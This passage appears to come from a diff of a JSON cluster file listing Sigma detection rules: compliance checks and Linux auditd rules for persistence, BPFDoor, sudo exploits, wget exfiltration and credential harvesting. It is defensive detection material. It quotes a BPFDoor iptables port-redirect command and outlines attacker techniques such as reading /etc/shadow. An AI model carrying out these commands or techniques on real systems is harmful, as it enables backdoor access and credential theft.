Ensure that an encrypted channels is used for all administrative account access.\n", - "meta": { - "author": "Alexandr Yampolskyi, SOC Prime, Tim Shelton", - "creation_date": "2019/03/26", - "falsepositive": [ - "Unknown" - ], - "filename": "firewall_cleartext_protocols.yml", - "level": "low", "logsource.category": "firewall", "logsource.product": "No established product", "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/firewall_cleartext_protocols.yml" - ], - "tags": "No established tags" - }, - "uuid": "d7fb8f0e-bd5f-45c2-b467-19571c490d7e", - "value": "Cleartext Protocol Usage" - }, - { - "description": "Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\nSigma detects\nEvent ID 4728 indicates a ‘Member is added to a Security Group’.\nEvent ID 4729 indicates a ‘Member is removed from a Security enabled-group’ .\nEvent ID 4730 indicates a ‘Security Group is deleted’.\nThe case is not applicable for Unix OS.\nSupported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\n", - "meta": { - "author": "Alexandr Yampolskyi, SOC Prime", - "creation_date": "2019/03/26", - "falsepositive": [ - "Unknown" - ], - "filename": "group_modification_logging.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", - 
"https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/group_modification_logging.yml" - ], - "tags": "No established tags" - }, - "uuid": "9cf01b6c-e723-4841-a868-6d7f8245ca6e", - "value": "Group Modification Logging" - }, - { - "description": "Host Without Firewall. Alert means not complied. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.", - "meta": { - "author": "Alexandr Yampolskyi, SOC Prime", - "creation_date": "2019/03/19", - "falsepositive": "No established falsepositives", - "filename": "host_without_firewall.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "qualys", - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml" - ], - "tags": "No established tags" - }, - "uuid": "6b2066c8-3dc7-4db7-9db0-6cc1d7b0dde9", - "value": "Host Without Firewall" - }, - { - "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels\nEnsure that an encryption is used for all sensitive information in transit.\nEnsure that an encrypted channels is used for all administrative account access.\n", - "meta": { - "author": "Alexandr Yampolskyi, SOC Prime", - "creation_date": "2019/03/26", - "falsepositive": [ - 
"Unknown" - ], - "filename": "netflow_cleartext_protocols.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "No established product", - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml" - ], - "tags": "No established tags" - }, - "uuid": "7e4bfe58-4a47-4709-828d-d86c78b7cc1f", - "value": "Cleartext Protocol Usage Via Netflow" - }, - { - "description": "Automatically lock workstation sessions after a standard period of inactivity.\nThe case is not applicable for Unix OS. Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019.\n", - "meta": { - "author": "Alexandr Yampolskyi, SOC Prime", - "creation_date": "2019/03/26", - "falsepositive": [ - "Unknown" - ], - "filename": "workstation_was_locked.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/workstation_was_locked.yml" - ], - "tags": "No established tags" - }, - "uuid": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", - "value": "Locked Workstation" - }, - { - "description": "Detects change of user environment. 
Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.", - "meta": { - "author": "Peter Matkovski", - "creation_date": "2019/05/12", - "falsepositive": [ - "Admin or User activity" - ], - "filename": "lnx_auditd_alter_bash_profile.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "MITRE Attack technique T1156; .bash_profile and .bashrc. ", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml" - ], - "tags": [ - "attack.s0003", - "attack.persistence", - "attack.t1546.004" - ] - }, - "uuid": "e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9", - "value": "Edit of .bash_profile and .bashrc" - }, - { - "description": "Detects attempts to record audio with arecord utility", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/09/04", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_audio_capture.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://linux.die.net/man/1/arecord", - "https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa", - "https://attack.mitre.org/techniques/T1123/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_audio_capture.yml" - ], - "tags": [ - "attack.collection", - "attack.t1123" - ] - }, - "uuid": "a7af2487-9c2f-42e4-9bb9-ff961f0561d5", - "value": "Audio Capture" - }, - { - "description": "Detect changes in auditd configuration files", - "meta": { - "author": "Mikhail Larin, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate administrative activity" - ], - "filename": "lnx_auditd_auditing_config_change.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/Neo23x0/auditd/blob/master/audit.rules", - 
"Self Experience", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_auditing_config_change.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.006" - ] - }, - "uuid": "977ef627-4539-4875-adf4-ed8f780c4922", - "value": "Auditing Configuration Changes on Linux Host" - }, - { - "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware.\nThis rule detect using dd and truncate to add a junk data to file.\n", - "meta": { - "author": "Igor Fits, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Legitimate script work" - ], - "filename": "lnx_auditd_binary_padding.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_binary_padding.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.001" - ] - }, - "uuid": "c52a914f-3d8b-4b2a-bb75-b3991e75f8ba", - "value": "Binary Padding - Linux" - }, - { - "description": "detects BPFDoor .lock and .pid files access in temporary file storage facility", - "meta": { - "author": "Rafal Piasecki", - "creation_date": "2022/08/10", - "falsepositive": [ - "Unlikely" - ], - "filename": "lnx_auditd_bpfdoor_file_accessed.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", - "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106", - "attack.t1059" - ] - }, - "uuid": "808146b2-9332-4d78-9416-d7e47012d83d", - "value": 
"BPFDoor Abnormal Process ID or Lock File Accessed" - }, - { - "description": "All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\nThe traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.\n", - "meta": { - "author": "Rafal Piasecki", - "creation_date": "2022/08/10", - "falsepositive": [ - "Legitimate ports redirect" - ], - "filename": "lnx_auditd_bpfdoor_port_redirect.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", - "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ] - }, - "uuid": "70b4156e-50fc-4523-aa50-c9dddf1993fc", - "value": "Bpfdoor TCP Ports Redirect" - }, - { - "description": "Detects attempts to discover the files with setuid/setgid capability on them. 
That would allow adversary to escalate their privileges.", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/11/28", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_capabilities_discovery.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://man7.org/linux/man-pages/man8/getcap.8.html", - "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/", - "https://mn3m.info/posts/suid-vs-capabilities/", - "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml" - ], - "tags": [ - "attack.collection", - "attack.privilege_escalation", - "attack.t1123", - "attack.t1548" - ] - }, - "uuid": "fe10751f-1995-40a5-aaa2-c97ccb4123fe", - "value": "Linux Capabilities Discovery" - }, - { - "description": "Detect file time attribute change to hide new or changes to existing files.", - "meta": { - "author": "Igor Fits, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_change_file_time_attr.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.006" - ] - }, - "uuid": "b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b", - "value": "File Time Attribute Change - Linux" - }, - { - "description": "Detects removing immutable file attribute.", - "meta": { - "author": "Jakob Weinzettl, oscd.community", - "creation_date": "2019/09/23", - "falsepositive": [ - "Administrator 
interacting with immutable files (e.g. for instance backups)." - ], - "filename": "lnx_auditd_chattr_immutable_removal.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.002" - ] - }, - "uuid": "a5b977d6-8a81-4475-91b9-49dbfcd941f7", - "value": "Remove Immutable File Attribute - Auditd" - }, - { - "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/09/24", - "falsepositive": [ - "Legitimate usage of xclip tools" - ], - "filename": "lnx_auditd_clipboard_collection.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1115/", - "https://linux.die.net/man/1/xclip", - "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ] - }, - "uuid": "214e7e6c-f21b-47ff-bb6f-551b2d143fcf", - "value": "Clipboard Collection with Xclip Tool - Auditd" - }, - { - "description": "Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", - "meta": { - "author": "Pawel Mazur", - 
"creation_date": "2021/10/01", - "falsepositive": [ - "Legitimate usage of xclip tools" - ], - "filename": "lnx_auditd_clipboard_image_collection.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1115/", - "https://linux.die.net/man/1/xclip", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ] - }, - "uuid": "f200dc3f-b219-425d-a17e-c38467364816", - "value": "Clipboard Collection of Image Data with Xclip Tool" - }, - { - "description": "Detects command line parameter very often used with coin miners", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/10/09", - "falsepositive": [ - "Other tools that use a --cpu-priority flag" - ], - "filename": "lnx_auditd_coinminer.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://xmrig.com/docs/miner/command-line-options", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_coinminer.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ] - }, - "uuid": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", - "value": "Possible Coin Miner CPU Priority Param" - }, - { - "description": "Detects the creation of a new user account. 
Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", - "meta": { - "author": "Marie Euler", - "creation_date": "2020/05/18", - "falsepositive": [ - "Admin activity" - ], - "filename": "lnx_auditd_create_account.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "MITRE Attack technique T1136; Create Account ", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml" - ], - "tags": [ - "attack.t1136.001", - "attack.persistence" - ] - }, - "uuid": "759d0d51-bc99-4b5e-9add-8f5b2c8e7512", - "value": "Creation Of An User Account" - }, - { - "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing\nrequired to trigger the heap-based buffer overflow.\n", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/02/01", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "cve.2021.3156" - ] - }, - "uuid": "5ee37487-4eb8-4ac2-9be1-d7d14cdc559f", - "value": "CVE-2021-3156 Exploitation Attempt" - }, - { - "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing.\nrequired to trigger the heap-based buffer overflow.\n", - "meta": { - "author": "Bhabesh Raj", - "creation_date": 
"2021/02/01", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "cve.2021.3156" - ] - }, - "uuid": "b9748c98-9ea7-4fdb-80b6-29bed6ba71d2", - "value": "CVE-2021-3156 Exploitation Attempt Bruteforcing" - }, - { - "description": "Detects exploitation attempt of vulnerability described in CVE-2021-4034.", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2022/01/27", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_cve_2021_4034.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/berdav/CVE-2021-4034", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034", - "https://access.redhat.com/security/cve/CVE-2021-4034", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ] - }, - "uuid": "40a016ab-4f48-4eee-adde-bbf612695c53", - "value": "CVE-2021-4034 Exploitation Attempt" - }, - { - "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": [ - "Legitimate use of archiving tools by legitimate user." 
- ], - "filename": "lnx_auditd_data_compressed.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_compressed.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1560.001" - ] - }, - "uuid": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", - "value": "Data Compressed" - }, - { - "description": "Detects attempts to post the file with the usage of wget utility.\nThe adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.\n", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/11/18", - "falsepositive": [ - "Legitimate usage of wget utility to post a file" - ], - "filename": "lnx_auditd_data_exfil_wget.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/tactics/TA0010/", - "https://linux.die.net/man/1/wget", - "https://gtfobins.github.io/gtfobins/wget/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ] - }, - "uuid": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", - "value": "Data Exfiltration with Wget" - }, - { - "description": "Detects overwriting (effectively wiping/deleting) of a file.", - "meta": { - "author": "Jakob Weinzettl, oscd.community", - "creation_date": "2019/10/23", - "falsepositive": [ - "Appending null bytes to files.", - "Legitimate overwrite of files." 
- ], - "filename": "lnx_auditd_dd_delete_file.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_dd_delete_file.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ] - }, - "uuid": "37222991-11e9-4b6d-8bdf-60fbe48f753e", - "value": "Overwriting the File with Dev Zero or Null" - }, - { - "description": "Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2022/01/22", - "falsepositive": [ - "Admin activity" - ], - "filename": "lnx_auditd_disable_system_firewall.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", - "https://attack.mitre.org/techniques/T1562/004/", - "https://firewalld.org/documentation/man-pages/firewall-cmd.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml" - ], - "tags": [ - "attack.t1562.004", - "attack.defense_evasion" - ] - }, - "uuid": "53059bc0-1472-438b-956a-7508a94a91f0", - "value": "Disable System Firewall" - }, - { - "description": "Detects file and folder permission changes.", - "meta": { - "author": "Jakob Weinzettl, oscd.community", - "creation_date": "2019/09/23", - "falsepositive": [ - "User interacting with files permissions (normal/daily behaviour)." 
- ], - "filename": "lnx_auditd_file_or_folder_permissions.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.002" - ] - }, - "uuid": "74c01ace-0152-4094-8ae2-6fd776dd43e5", - "value": "File or Folder Permissions Change" - }, - { - "description": "Detecting attempts to extract passwords with grep", - "meta": { - "author": "Igor Fits, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_find_cred_in_files.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001" - ] - }, - "uuid": "df3fcaea-2715-4214-99c5-0056ea59eb35", - "value": "Credentials In Files - Linux" - }, - { - "description": "Detects adversary creating hidden file or directory, by detecting directories or files with . 
as the first character", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/09/06", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_hidden_files_directories.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", - "https://attack.mitre.org/techniques/T1564/001/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ] - }, - "uuid": "d08722cd-3d09-449a-80b4-83ea2d9d4616", - "value": "Hidden Files and Directories" - }, - { - "description": "Detects appending of zip file to image", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/09/09", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_hidden_zip_files_steganography.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1027/003/", - "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.003" - ] - }, - "uuid": "45810b50-7edc-42ca-813b-bdac02fb946b", - "value": "Steganography Hide Zip Information in Picture File" - }, - { - "description": "Detect attempt to enable auditing of TTY input", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/05/24", - "falsepositive": [ - "Administrative work" - ], - "filename": "lnx_auditd_keylogging_with_pam_d.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md", - "https://attack.mitre.org/techniques/T1003/", - "https://linux.die.net/man/8/pam_tty_audit", - "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", - "https://access.redhat.com/articles/4409591#audit-record-types-2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1056.001" - ] - }, - "uuid": "49aae26c-450e-448b-911d-b3c13d178dfc", - "value": "Linux Keylogging with Pam.d" - }, - { - "description": "Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.", - "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_ld_so_preload_mod.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md", - "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.006" - ] - }, - "uuid": "4b3cb710-5e83-4715-8c45-8b2b5b3e5751", - "value": "Modification of ld.so.preload" - }, - { - "description": "Detects loading of kernel modules with insmod command.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nAdversaries may use LKMs to obtain persistence within the system or elevate 
the privileges.\n", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/11/02", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_load_module_insmod.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1547/006/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", - "https://linux.die.net/man/8/insmod", - "https://man7.org/linux/man-pages/man8/kmod.8.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.006" - ] - }, - "uuid": "106d7cbd-80ff-4985-b682-a7043e5acb72", - "value": "Loading of Kernel Module via Insmod" - }, - { - "description": "Detect changes of syslog daemons configuration files", - "meta": { - "author": "Mikhail Larin, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate administrative activity" - ], - "filename": "lnx_auditd_logging_config_change.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "self experience", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_logging_config_change.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.006" - ] - }, - "uuid": "c830f15d-6f6e-430f-8074-6f73d6807841", - "value": "Logging Configuration Changes on Linux Host" - }, - { - "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\nSeveral different variations of this technique have been observed.\n", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": "No established falsepositives", 
- "filename": "lnx_auditd_masquerading_crond.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ] - }, - "uuid": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", - "value": "Masquerading as Linux Crond Process" - }, - { - "description": "Detects enumeration of local or remote network services.", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/21", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "lnx_auditd_network_service_scanning.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_service_scanning.yml" + 